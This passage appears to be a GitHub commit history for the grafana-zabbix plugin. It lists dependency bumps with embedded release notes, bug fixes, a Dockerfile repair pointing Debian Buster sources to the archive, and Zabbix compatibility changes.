href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1369">grafana/grafana-plugin-sdk-go#1369</a></li> <li>fix(deps): update module golang.org/x/sys to v0.35.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1374">grafana/grafana-plugin-sdk-go#1374</a></li> <li>fix(deps): update module google.golang.org/protobuf to v1.36.7 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1373">grafana/grafana-plugin-sdk-go#1373</a></li> <li>build(deps): bump golang.org/x/net from 0.42.0 to 0.43.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1375">grafana/grafana-plugin-sdk-go#1375</a></li> <li>fix(deps): update golang.org/x/exp digest to a408d31 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1377">grafana/grafana-plugin-sdk-go#1377</a></li> <li>chore(deps): update actions/checkout action to v4.3.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1378">grafana/grafana-plugin-sdk-go#1378</a></li> <li>fix(deps): update golang.org/x/exp digest to 51f8813 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1380">grafana/grafana-plugin-sdk-go#1380</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to 5f3141c by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1381">grafana/grafana-plugin-sdk-go#1381</a></li> <li>fix(deps): update module github.com/hashicorp/go-plugin to v1.7.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1382">grafana/grafana-plugin-sdk-go#1382</a></li> <li>chore(deps): Update dependency go to v1.24.6 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1386">grafana/grafana-plugin-sdk-go#1386</a></li> </ul> </li> </ul> <h2>New Contributors</h2> <ul> <li><a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] made their first contribution in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1356">grafana/grafana-plugin-sdk-go#1356</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.278.0...v0.279.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.278.0...v0.279.0</a></p> <h2>Compatibility</h2> <pre><code>❯ gorelease --base v0.278.0 --version v0.279.0 # summary v0.279.0 is a valid semantic version for this release. </code></pre> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
Pavel Chalyk
|
b42bd2e3c2 |
Set correct link to the documentation (#2068)
* Link the PR to the related issue https://github.com/grafana/grafana-zabbix/issues/2067 |
||
|
Zoltán Bedi
|
fb6b95b92b | Release 5.2.1 (#2066) | ||
Kristina
|
cfe806fc05 |
Forward refID to resultant dataframe (#2065)
Fixes #1982 With a refID of `test test` <img width="273" height="223" alt="Screenshot 2025-08-06 at 4 11 41 PM" src="https://github.com/user-attachments/assets/1c20e70d-f2d2-40e7-a494-20aa4e1c3d07" /> Before <img width="291" height="193" alt="Screenshot 2025-08-06 at 4 18 40 PM" src="https://github.com/user-attachments/assets/b5ccb244-ac92-4929-b589-e5d01eebfad6" /> After <img width="218" height="208" alt="Screenshot 2025-08-06 at 4 11 33 PM" src="https://github.com/user-attachments/assets/6b0049b0-6829-4599-82dd-5af001e94690" /> |
||
|
dependabot[bot]
|
5dec534e2a |
Bump form-data from 4.0.0 to 4.0.4 (#2059)
Bumps [form-data](https://github.com/form-data/form-data) from 4.0.0 to 4.0.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/releases">form-data's releases</a>.</em></p> <blockquote> <h2>v4.0.1</h2> <h3>Fixes</h3> <ul> <li>npmignore temporary build files (<a href="https://redirect.github.com/form-data/form-data/issues/532">#532</a>)</li> <li>move util.isArray to Array.isArray (<a href="https://redirect.github.com/form-data/form-data/issues/564">#564</a>)</li> </ul> <h3>Tests</h3> <ul> <li>migrate from travis to GHA</li> </ul> </blockquote> </details> <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/blob/master/CHANGELOG.md">form-data's changelog</a>.</em></p> <blockquote> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a> - 2025-07-16</h2> <h3>Commits</h3> <ul> <li>[meta] add <code>auto-changelog</code> <a href=" |
||
Hugo Häggmark
|
6cc6dcabe1 |
Chore: removes props mutation (#2056)
While investigating some potential mutations [here](https://ops.grafana-ops.net/d/83f4951f-2ef3-4260-91a0-39a031992b75/getmutationobserverproxy-logs) I was able to find these mutating [lines](https://github.com/grafana/grafana-zabbix/blob/main/src/datasource/components/ConfigEditor.tsx#L55-L57) Although this works right now, this might not work in future Grafana versions. This PR makes sure we don't mutate the props. I haven't been able to test this manually so I could use some help to make sure the plugin works as expected. --------- Co-authored-by: ivanahuckova <ivana.huckova@gmail.com> |
||
Ivana Huckova
|
d83306c216 |
Fix Zabbix compatibility tests Docker build failures (#2057)
The Zabbix compatibility tests workflow were failing with Docker build errors: ``` E: The repository 'http://deb.debian.org/debian buster Release' does not have a Release file. E: The repository 'http://deb.debian.org/debian buster-updates Release' does not have a Release file. E: The repository 'http://security.debian.org/debian-security buster/updates Release' does not have a Release file. ``` The `python:2.7` Docker image is based on Debian Buster, which reached end-of-life in August 2022. The Debian repositories for Buster have been moved from their original locations to `archive.debian.org`, but the Docker image still points to the original URLs. This PR updates `devenv/zas-agent/Dockerfile` to redirect repository sources to use Debian's archive repositories: - `http://deb.debian.org/debian` → `http://archive.debian.org/debian` - `http://security.debian.org/debian-security` → `http://archive.debian.org/debian-security` This allows the Python 2.7 environment to continue working with the zas_agent dependency, which requires Python 2.7 syntax. |
||
|
Zoltán Bedi
|
7e0070e4f6 | Release: Bump version to 5.2.0 and update changelog for new features and fixes (#2054) | ||
|
Zoltán Bedi
|
bb6ade69c8 |
Fix: Update Zabbix API connector to handle versioning for 'with_hosts' parameter (#2049)
This changes the version number for `with_hosts` to return `real_hosts` when version is 6.0.0 or below. In 6.2 `real_hosts` is deprecated. https://www.zabbix.com/documentation/6.2/en/manual/api/reference/hostgroup/get In 6.0 it isn't. https://www.zabbix.com/documentation/6.0/en/manual/api/reference/hostgroup/get Fixes https://github.com/grafana/grafana-zabbix/issues/2048 |
||
Christos Diamantis
|
30c0b0e982 |
Ability to execute "Manual event actions" on Zabbix Problems panel (#2024)
This PR resolves the below issues: #2022 #1465 Specifically, when executing a script on the problems panel, we do check if the script scope is event or host. Based on the script scope, the Zabbix API call is constructed differently. --------- Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Christos Diamantis
|
04ef3774b0 |
Zabbix 7.4 compatibility tests (#2053)
* Resolves issue (#2051) |